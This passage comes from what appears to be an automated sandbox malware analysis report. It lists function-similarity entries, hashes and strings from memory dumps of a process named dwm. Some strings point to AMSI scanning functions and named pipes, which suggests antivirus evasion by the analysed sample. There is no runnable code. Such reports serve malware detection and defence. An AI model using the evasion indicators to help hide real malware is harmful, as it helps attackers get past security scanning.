                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction ID: 6314c51c4bbb33e11e40deb5b93baf5270c20fed3389cabecbb00c950c42303b
                                                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction Fuzzy Hash: 53F04F62304685E2EB709B61F5C83597371F754B88F944025DA8947D58EF6CC69CCB21
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction ID: a4ee5c83b7c3e31b22992ad886de9ab76a7927c02ef48da9e3796cfe319312cb
                                                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction Fuzzy Hash: D8F082A4304B8081EE049B53BD18119B370BB88FC1F649430EE8E07B18DF6CC556C712
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction ID: 9cc1e1c6918ab2aa30d497d87bc35be6ce217cec7ee660061e8dc256c73a9c8d
                                                          • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction Fuzzy Hash: 60F0906131160191EA109B64A8883697330EB89760F680A19DAFE475E4DF2DC958C326
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction ID: 1c85e2c862546d5d4a91e20a9f2957db8ad97bff34855c1c7d7a2c78379b7fac
                                                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction Fuzzy Hash: 95F08264304B80A1EA649B13B91811AB371BB58FC0F688130EE8A47F18CF6CC589C711
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcSleep
                                                          • String ID: AmsiScanBuffer$amsi.dll
                                                          • API String ID: 188063004-3248079830
                                                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction ID: 286da797a1bfe9eecbf103d18c79398e36d186b9545bd24d432004cb9dc54d8f
                                                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction Fuzzy Hash: 56D06710A51A01F5EA6DBB51EC5C3583372AB74B81FE40419C58A45AA4DF2C89DEC362
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction ID: 6530acc4772a8d12f6973325de470be2d0dea751e69314b5dacff1c02cbfc329
                                                          • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction Fuzzy Hash: 4902B432259B8496EBB0DB55F49835AB7B0F384794F204016EACE87BA8DF7DC494CB11
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction ID: c7b2fc1b66fd09e5e4ea1d3a806477ad2240914a5d858d9160325d174c5f3b40
                                                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction Fuzzy Hash: 26519F3631465187E764DF1AF848A6AB3B5F788B84F604119DE8E43B98EF3ACD05CB11
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction ID: ca187cd21d7f5f7b56b9816f640356e19585e2d4e68a0157b3e8146337f20523
                                                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction Fuzzy Hash: 7751B335314651A7E7B8DF2AE84862AB3F5F388B84F604119DE8A43F55DF38C945CB11
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 9064501d9207191e0a03e88cf4adaad404ffb1d761ed384ef498a641ed770bed
                                                          • Instruction ID: 5d59b2b0103d7afae379df0fa74fc5c98ef46df26fa5efd1de3b985bc28ac734
                                                          • Opcode Fuzzy Hash: 9064501d9207191e0a03e88cf4adaad404ffb1d761ed384ef498a641ed770bed
                                                          • Instruction Fuzzy Hash: 4F61AA36529A44C7E7609F15E85831EB7B0F388794F204525FACD47BA8EB7EC940CB26
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction ID: 7ed8a6c2aec3008d9a0ccda01c3aeb7883eca110a2eac85899d85163b797e3db
                                                          • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction Fuzzy Hash: 4F619536669A44D7EBB09B55E46831AB7B0F388744F200126EACD47FA8DB7DC544CB22
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID:
                                                          • API String ID: 1092925422-0
                                                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction ID: 77ad2b19e7a2230ec0cb9af4e572aef01a321567f89bdc863c920986bb1bd4b3
                                                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction Fuzzy Hash: 59115436605740E3EB74AF61E40825A77B0FB54B80F14012ADE8D03B98EF7DCA99C795
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 2395640692-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: 440627ce64d2ada56b8f9d0f3db69e9e517e1377010d291128d5e7e4d0537f6e
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: 7751B13A3116008AEB54DF25E858B6C77B1F354F98F248125DA9E57B88EB7BCC41C711
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2062869608.000002BAAF190000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF190000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaf190000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: 3fe2270a86bdc9aca7786154ab239505db148fb21d89b697c7277f44d6493fb3
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: 82517A332042818AEB7C8F259188358BFB0F354B94F584117DB9987B95CB3BD894CBA3
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: abf1f989ffcfa5047e80a579fcbc900d8e188ed999f07ffb6a8b8fac0b636424
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: AF61AD33508BC486EB209F15E84439AB7B0F789B98F544215EBDC1BB99EB7DC590CB11
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: 0c4456b12ac99b31c80c42d622e347fb2cbe79bb6605cb1c4bca8687c6397561
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: 86514A372006808BEB748F26994835977B1F354B98F244116DADD4FF95EB3ADCA1CB22
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2183641314.000002BAAEDD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaedd0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: b20c374377ad39ba3a6f1a8f709f82c5dcb46eb1bc1f2764971fd48c3ac288ef
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: F9519D362063848AEB748F21958876877B0F354B94F288117DBDDCBBD9CB79D450CB62
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2236561607.000002BAAEE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEE30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaee30000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: e788aadee9852db99d6e56b453df9be503104dd3a2d1b5cfb31bac03de6f5d9b
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: D1518F36204782AAEB748F21D54836877B4F354B98F3C4215DAD947FD9CB39C8A0CB12
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 429552153e51fd1f0dadb1a17f7b05fbd0ecc4c1cc7d084759c01038f325f827
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: 3961AC72508BC895EBB18F25E44479AB7B0F794B98F548215EBDC17B99DB3CC0A0CB11
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: 581b3af6a5f09984677c7e02dd3ac43814da8282dd10c8c1a0058d4ae8aeda78
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: BA516D32280788ABEBF48F26958835877B1F354B94F254116DADE47FD5DB38C861CB12
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction ID: 1f9f99b32e30b4f6f9d0b627625a7301b595cb0cbe5a4b9e72d878c69f789e12
                                                          • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction Fuzzy Hash: 53114F11314781A2EB109B35EC0835A77B4B785780FA44525DACD87B94FF6ACD15C721
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction ID: cd6eee95d08178066752497881dbfb1b4bf5367c20e995cf48df9bff46043c34
